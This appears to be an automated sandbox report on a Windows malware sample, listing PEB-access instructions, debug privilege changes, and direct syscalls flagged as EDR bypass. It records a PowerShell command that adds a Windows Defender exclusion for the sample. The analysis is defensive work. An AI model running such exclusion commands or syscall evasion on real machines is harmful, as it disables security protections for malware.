Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012449D0 mov eax, dword ptr fs:[00000030h]	6_2_012449D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DA9D3 mov eax, dword ptr fs:[00000030h]	6_2_012DA9D3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B483A mov eax, dword ptr fs:[00000030h]	6_2_012B483A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B483A mov eax, dword ptr fs:[00000030h]	6_2_012B483A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A830 mov eax, dword ptr fs:[00000030h]	6_2_0124A830
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov eax, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov eax, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov eax, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov ecx, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov eax, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01232835 mov eax, dword ptr fs:[00000030h]	6_2_01232835
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129C810 mov eax, dword ptr fs:[00000030h]	6_2_0129C810
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6870 mov eax, dword ptr fs:[00000030h]	6_2_012A6870
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6870 mov eax, dword ptr fs:[00000030h]	6_2_012A6870
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129E872 mov eax, dword ptr fs:[00000030h]	6_2_0129E872
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129E872 mov eax, dword ptr fs:[00000030h]	6_2_0129E872
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01222840 mov ecx, dword ptr fs:[00000030h]	6_2_01222840
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01240854 mov eax, dword ptr fs:[00000030h]	6_2_01240854
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214859 mov eax, dword ptr fs:[00000030h]	6_2_01214859
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214859 mov eax, dword ptr fs:[00000030h]	6_2_01214859
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210887 mov eax, dword ptr fs:[00000030h]	6_2_01210887
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129C89D mov eax, dword ptr fs:[00000030h]	6_2_0129C89D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DA8E4 mov eax, dword ptr fs:[00000030h]	6_2_012DA8E4
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0124C8F9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124C8F9 mov eax, dword ptr fs:[00000030h]	6_2_0124C8F9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123E8C0 mov eax, dword ptr fs:[00000030h]	6_2_0123E8C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123EB20 mov eax, dword ptr fs:[00000030h]	6_2_0123EB20
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123EB20 mov eax, dword ptr fs:[00000030h]	6_2_0123EB20
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D8B28 mov eax, dword ptr fs:[00000030h]	6_2_012D8B28
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D8B28 mov eax, dword ptr fs:[00000030h]	6_2_012D8B28
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128EB1D mov eax, dword ptr fs:[00000030h]	6_2_0128EB1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120CB7E mov eax, dword ptr fs:[00000030h]	6_2_0120CB7E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B8B42 mov eax, dword ptr fs:[00000030h]	6_2_012B8B42
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6B40 mov eax, dword ptr fs:[00000030h]	6_2_012A6B40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6B40 mov eax, dword ptr fs:[00000030h]	6_2_012A6B40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DAB40 mov eax, dword ptr fs:[00000030h]	6_2_012DAB40
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220BBE mov eax, dword ptr fs:[00000030h]	6_2_01220BBE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220BBE mov eax, dword ptr fs:[00000030h]	6_2_01220BBE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218BF0 mov eax, dword ptr fs:[00000030h]	6_2_01218BF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218BF0 mov eax, dword ptr fs:[00000030h]	6_2_01218BF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218BF0 mov eax, dword ptr fs:[00000030h]	6_2_01218BF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129CBF0 mov eax, dword ptr fs:[00000030h]	6_2_0129CBF0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123EBFC mov eax, dword ptr fs:[00000030h]	6_2_0123EBFC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01230BCB mov eax, dword ptr fs:[00000030h]	6_2_01230BCB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01230BCB mov eax, dword ptr fs:[00000030h]	6_2_01230BCB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01230BCB mov eax, dword ptr fs:[00000030h]	6_2_01230BCB
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210BCD mov eax, dword ptr fs:[00000030h]	6_2_01210BCD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210BCD mov eax, dword ptr fs:[00000030h]	6_2_01210BCD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210BCD mov eax, dword ptr fs:[00000030h]	6_2_01210BCD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BEBD0 mov eax, dword ptr fs:[00000030h]	6_2_012BEBD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CA24 mov eax, dword ptr fs:[00000030h]	6_2_0124CA24
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123EA2E mov eax, dword ptr fs:[00000030h]	6_2_0123EA2E
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01234A35 mov eax, dword ptr fs:[00000030h]	6_2_01234A35
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01234A35 mov eax, dword ptr fs:[00000030h]	6_2_01234A35
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CA38 mov eax, dword ptr fs:[00000030h]	6_2_0124CA38
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129CA11 mov eax, dword ptr fs:[00000030h]	6_2_0129CA11
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CA6F mov eax, dword ptr fs:[00000030h]	6_2_0124CA6F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CA6F mov eax, dword ptr fs:[00000030h]	6_2_0124CA6F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CA6F mov eax, dword ptr fs:[00000030h]	6_2_0124CA6F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128CA72 mov eax, dword ptr fs:[00000030h]	6_2_0128CA72
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128CA72 mov eax, dword ptr fs:[00000030h]	6_2_0128CA72
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216A50 mov eax, dword ptr fs:[00000030h]	6_2_01216A50
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220A5B mov eax, dword ptr fs:[00000030h]	6_2_01220A5B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220A5B mov eax, dword ptr fs:[00000030h]	6_2_01220A5B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218AA0 mov eax, dword ptr fs:[00000030h]	6_2_01218AA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218AA0 mov eax, dword ptr fs:[00000030h]	6_2_01218AA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01266AA4 mov eax, dword ptr fs:[00000030h]	6_2_01266AA4
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121EA80 mov eax, dword ptr fs:[00000030h]	6_2_0121EA80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4A80 mov eax, dword ptr fs:[00000030h]	6_2_012E4A80
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01248A90 mov edx, dword ptr fs:[00000030h]	6_2_01248A90
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124AAEE mov eax, dword ptr fs:[00000030h]	6_2_0124AAEE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124AAEE mov eax, dword ptr fs:[00000030h]	6_2_0124AAEE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01266ACC mov eax, dword ptr fs:[00000030h]	6_2_01266ACC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01266ACC mov eax, dword ptr fs:[00000030h]	6_2_01266ACC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01266ACC mov eax, dword ptr fs:[00000030h]	6_2_01266ACC
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210AD0 mov eax, dword ptr fs:[00000030h]	6_2_01210AD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01244AD0 mov eax, dword ptr fs:[00000030h]	6_2_01244AD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01244AD0 mov eax, dword ptr fs:[00000030h]	6_2_01244AD0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01298D20 mov eax, dword ptr fs:[00000030h]	6_2_01298D20
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122AD00 mov eax, dword ptr fs:[00000030h]	6_2_0122AD00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122AD00 mov eax, dword ptr fs:[00000030h]	6_2_0122AD00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122AD00 mov eax, dword ptr fs:[00000030h]	6_2_0122AD00
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01206D10 mov eax, dword ptr fs:[00000030h]	6_2_01206D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01206D10 mov eax, dword ptr fs:[00000030h]	6_2_01206D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01206D10 mov eax, dword ptr fs:[00000030h]	6_2_01206D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01244D1D mov eax, dword ptr fs:[00000030h]	6_2_01244D1D
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C8D10 mov eax, dword ptr fs:[00000030h]	6_2_012C8D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C8D10 mov eax, dword ptr fs:[00000030h]	6_2_012C8D10
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A8D6B mov eax, dword ptr fs:[00000030h]	6_2_012A8D6B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210D59 mov eax, dword ptr fs:[00000030h]	6_2_01210D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210D59 mov eax, dword ptr fs:[00000030h]	6_2_01210D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01210D59 mov eax, dword ptr fs:[00000030h]	6_2_01210D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218D59 mov eax, dword ptr fs:[00000030h]	6_2_01218D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218D59 mov eax, dword ptr fs:[00000030h]	6_2_01218D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218D59 mov eax, dword ptr fs:[00000030h]	6_2_01218D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218D59 mov eax, dword ptr fs:[00000030h]	6_2_01218D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01218D59 mov eax, dword ptr fs:[00000030h]	6_2_01218D59
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D8DAE mov eax, dword ptr fs:[00000030h]	6_2_012D8DAE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D8DAE mov eax, dword ptr fs:[00000030h]	6_2_012D8DAE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E4DAD mov eax, dword ptr fs:[00000030h]	6_2_012E4DAD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01246DA0 mov eax, dword ptr fs:[00000030h]	6_2_01246DA0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CDB1 mov ecx, dword ptr fs:[00000030h]	6_2_0124CDB1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CDB1 mov eax, dword ptr fs:[00000030h]	6_2_0124CDB1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124CDB1 mov eax, dword ptr fs:[00000030h]	6_2_0124CDB1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01238DBF mov eax, dword ptr fs:[00000030h]	6_2_01238DBF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01238DBF mov eax, dword ptr fs:[00000030h]	6_2_01238DBF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121ADE0 mov eax, dword ptr fs:[00000030h]	6_2_0121ADE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121ADE0 mov eax, dword ptr fs:[00000030h]	6_2_0121ADE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121ADE0 mov eax, dword ptr fs:[00000030h]	6_2_0121ADE0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121ADE0 mov eax, dword ptr fs:[00000030h]	6_2_0121ADE0

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtUnmapViewOfSection: Direct from: 0x76EF2D3C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
